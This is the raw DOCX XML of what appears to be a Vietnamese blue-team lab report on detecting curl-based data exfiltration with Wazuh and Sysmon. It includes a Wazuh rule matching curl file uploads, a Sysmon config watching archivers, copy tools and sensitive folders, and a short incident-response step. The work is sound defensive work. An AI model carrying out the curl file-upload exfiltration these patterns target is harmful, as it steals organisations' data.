        <w:t xml:space="preserve"> và đồng thời truy cập Wazuh Dashboard, sau đó lựa chọn khoảng thời gian tương ứng. Trong Wazuh, tìm kiếm sự kiện của Window thông qua phần Threat Hunting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654E24D" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="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1420B28" wp14:editId="5DB2C037">
            <wp:extent cx="5730875" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99" name="image112.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="99" name="image112.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A80CE" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03AC6111" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2D84F126" wp14:editId="602404B6">
            <wp:extent cx="5730875" cy="3225800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="image49.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="64" name="image49.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3225800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="071470F7" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Có thể thấy rằng trước thời điểm custom rule được triển khai (10:25), hệ thống không tạo ra bất kỳ cảnh báo nào liên quan đến hành vi exfiltration. Mặc dù Wazuh vẫn thu thập thành công các log từ Sysmon, bao gồm thông tin về tiến trình curl.exe, đường dẫn thực thi, tham số dòng lệnh và địa chỉ IP đích, nhưng các sự kiện này chỉ được lưu trữ dưới dạng log thông thường. Để nhận diện hành vi tải tệp ZIP lên máy chủ bên ngoài, nhà phân tích phải tự kiểm tra và phân tích nội dung của trường CommandLine. Điều này cho thấy hệ thống có khả năng quan sát và thu thập dữ liệu (Visibility) nhưng chưa có cơ chế phát hiện và cảnh báo tự động (Detection) đối với hành vi đánh cắp dữ liệu thông qua curl.exe. Do đó, nguy cơ bỏ sót các hoạt động exfiltration là tương đối cao nếu việc giám sát chỉ dựa vào quá trình phân tích thủ công.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E7884" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A2300E" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_heading=h.f9zmw4lo9qff" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="38" w:name="_Toc234664918"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5. Xây dựng rule trên SIEM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="0A1A433C" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style10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54096464" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:tag w:val="goog_rdk_71"/>
              <w:id w:val="-514558946"/>
              <w:lock w:val="contentLocked"/>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2C92067A"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&lt;group name="local,sysmon,curl_exfiltration,"&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="790F3A34"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&lt;rule id="100502" level="15"&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="5838CC75"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&lt;if_group&gt;sysmon_event1&lt;/if_group&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="1608902E"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&lt;field name="win.eventdata.image" type="pcre2"&gt;(?i)curl\.exe$&lt;/field&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="618FE8DC"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&lt;field name="win.eventdata.commandLine" type="pcre2"&gt;(?i)-F\s+files=@&lt;/field&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="68E529F1"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&lt;description&gt;Suspicious curl file upload detected&lt;/description&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="3A870394"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&lt;mitre&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="68A1165C"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 xml:space="preserve">              &lt;id&gt;T1048&lt;/id&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="06E3C036"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&lt;id&gt;T1567&lt;/id&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="6A518399"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&lt;/mitre&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="54327653"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&lt;/rule&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2EF21DA7"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&lt;/group&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="19685ECC" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
                <w:pPr>
                  <w:widowControl w:val="0"/>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                    <w:sz w:val="26"/>
                    <w:szCs w:val="26"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="075D3795" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_heading=h.xaphhpnfg68r" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="40" w:name="_Toc234664919"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Xây dựng rule trên Window Agent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="1E2A0E25" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style10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08C5E89D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:tag w:val="goog_rdk_72"/>
              <w:id w:val="-252074964"/>
              <w:lock w:val="contentLocked"/>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4E6D7210"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 ========================= --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="57BDBABC"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 Insider Threat Detection --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="24B19FDB"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 ========================= --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="4D4E5B11" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
                <w:pPr>
                  <w:spacing w:before="120" w:after="120"/>
                  <w:jc w:val="both"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                    <w:sz w:val="26"/>
                    <w:szCs w:val="26"/>
                    <w:highlight w:val="white"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="52087218"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 Process Creation --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="290DD12C"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&lt;ProcessCreate onmatch="include"&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="121E3F48"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&lt;Image condition="contains"&gt;powershell.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2D6E6CC6"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&lt;Image condition="contains"&gt;pwsh.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="004FA394"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&lt;Image condition="contains"&gt;cmd.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="0A43085C"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&lt;Image condition="contains"&gt;curl.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="48A46F9D"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&lt;Image condition="contains"&gt;7z.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="675AB91C"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&lt;Image condition="contains"&gt;7za.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="1E7C44FC"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&lt;Image condition="contains"&gt;tar.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="206F3AE9"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&lt;Image condition="contains"&gt;robocopy.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="6633BB6F"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&lt;Image condition="contains"&gt;xcopy.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="69AA7367"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&lt;/ProcessCreate&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="4B1A2DB4" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
                <w:pPr>
                  <w:spacing w:before="120" w:after="120"/>
                  <w:jc w:val="both"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                    <w:sz w:val="26"/>
                    <w:szCs w:val="26"/>
                    <w:highlight w:val="white"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="465832D3"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 Network Connections --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="40A299BA"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&lt;NetworkConnect onmatch="include"&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="38F03C94"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&lt;Image condition="contains"&gt;curl.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7350C298"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 xml:space="preserve">      &lt;Image condition="contains"&gt;powershell.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7C463056"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&lt;Image condition="contains"&gt;pwsh.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2BB93B78"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&lt;Image condition="contains"&gt;7z.exe&lt;/Image&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7C2B378B"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&lt;/NetworkConnect&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="20FEBE3E"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 ZIP/RAR/7Z Creation --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="67D515FB"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&lt;FileCreate onmatch="include"&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="74B926A1"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&lt;TargetFilename condition="contains"&gt;.zip&lt;/TargetFilename&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7E0BF6A1"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&lt;TargetFilename condition="contains"&gt;.7z&lt;/TargetFilename&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2C018057"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&lt;TargetFilename condition="contains"&gt;.rar&lt;/TargetFilename&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="50A55B34"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&lt;/FileCreate&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="72A8AC4F"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 Data Staging Folder --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="4BE74B69"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&lt;FileCreate onmatch="include"&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="0344C69A"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&lt;TargetFilename condition="contains"&gt;\Staging\&lt;/TargetFilename&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="0083B20E"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&lt;/FileCreate&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="575267BA"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 Sensitive Data Folder --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="0F623497"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&lt;FileCreate onmatch="include"&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="45884C69"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&lt;TargetFilename condition="contains"&gt;\VIP_Customers\&lt;/TargetFilename&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="18E843E5"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&lt;/FileCreate&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="21816350"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 Cleanup Activity --&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7BCBB399"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&lt;FileDelete onmatch="include"&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="50B5F5FC"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&lt;TargetFilename condition="contains"&gt;.zip&lt;/TargetFilename&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="6FAA92B2"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&lt;TargetFilename condition="contains"&gt;.7z&lt;/TargetFilename&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7DCAA1CF"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&lt;/FileDelete&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="61AE78CF" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
                <w:pPr>
                  <w:spacing w:before="120"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&lt;/EventFiltering&gt;</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7D5D8BB7" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">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&lt;/Sysmon&gt;</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B798FB3" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_heading=h.bk8uo8xlb3bu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="42" w:name="_Toc234664920"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>7. Kịch bản phát hiện và điều tra (Blue Team)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="718A967F"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Suspicious Outbound Transfer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ghi nhận tiến trình hệ thống curl.exe kết nối mạng ra địa chỉ IP Public lạ qua cổng 8000 ngoài giờ hành chính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBC897C" w14:textId="77777777" w:rsidR="000D3737"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Kết quả cho thấy Wazuh ngay lập tức sinh ra một cảnh báo mới với mức độ nghiêm trọng cao. Alert hiển thị rõ ràng hệ thống đã phát hiện hành vi tải tệp bằng curl.exe, đồng thời gắn nhãn MITRE ATT&amp;CK liên quan đến kỹ thuật Exfiltration. Nhà phân tích không còn phải tự đọc từng dòng CommandLine để xác định mối đe dọa như trước. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F343EC" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="36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60D5A603" wp14:editId="7F4EB081">
            <wp:extent cx="5730875" cy="2819400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="image37.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="47" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A818189" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="36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08D648E4" wp14:editId="1FB70867">
            <wp:extent cx="5730875" cy="2679700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48" name="image38.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="48" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2679700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05534595" w14:textId="77777777" w:rsidR="000D3737"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Trước khi triển khai Custom Rule, Wazuh chỉ ghi nhận sự kiện Sysmon Process Create nhưng không hiểu rằng đây là hành vi exfiltration. Toàn bộ quá trình phân tích phụ thuộc vào khả năng quan sát và kinh nghiệm của SOC Analyst. Nếu số lượng log lớn, khả năng bỏ sót sự kiện là rất cao.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A10C50" w14:textId="77777777" w:rsidR="000D3737"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triển khai Custom Rule, cùng một hành vi tấn công được tự động nhận diện và sinh cảnh báo ngay khi xảy ra. Hệ thống không chỉ thu thập dữ liệu mà còn có khả năng phát hiện chủ động. Điều này giúp giảm đáng kể thời gian điều tra, tăng khả năng phát hiện sớm và hỗ trợ SOC Analyst tập trung vào các sự kiện thực sự quan trọng thay vì phải rà soát thủ công hàng nghìn log mỗi ngày.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B625931" w14:textId="77777777" w:rsidR="000D3737"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Như vậy, Custom Rule đã chuyển hệ thống từ trạng thái "có log nhưng không phát hiện" sang trạng thái "có log và tự động cảnh báo", qua đó nâng cao đáng kể hiệu quả giám sát và phát hiện các hành vi đánh cắp dữ liệu trong môi trường doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17047782" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc234664921"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8. Quy trình xử lý sự cố (Incident Response Playbook)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="21696D60"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Ngăn chặn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực hiện khóa (Disable) ngay lập tức tài khoản Active Directory của nhân viên kinh doanh trên Domain Controller. Sử dụng giải pháp EDR cách ly máy trạm khỏi mạng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6495C9B9" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6168B3D8" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C8460E" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06343FBC" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7DCF10" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000D373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237A3" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158DF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2CAC7DFE" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158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Xihei">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FFE2664-FC71-40FC-A706-0EE40FD39042}"/>
    <w:embedBold r:id="rId2" w:fontKey="{469FB707-2E9D-4F36-B5BA-FB95FF793A05}"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId3" w:fontKey="{23622EEA-3535-488E-9A61-70DFDC92F44A}"/>
  </w:font>
  <w:font w:name="Cardo">
    <w:altName w:val="Segoe Print"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>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CF94E895-E7C5-42EC-9724-DB1133D203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2432C" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158DF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02503349" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158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5CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00D645CC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="STXihei" w:eastAsia="STXihei" w:hAnsi="STXihei" w:hint="eastAsia"/>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CD4B1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05CD4B1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E671F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05E671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137AA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08137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FD188A"/>
    <w:multiLevelType w:val="multilevel"/>
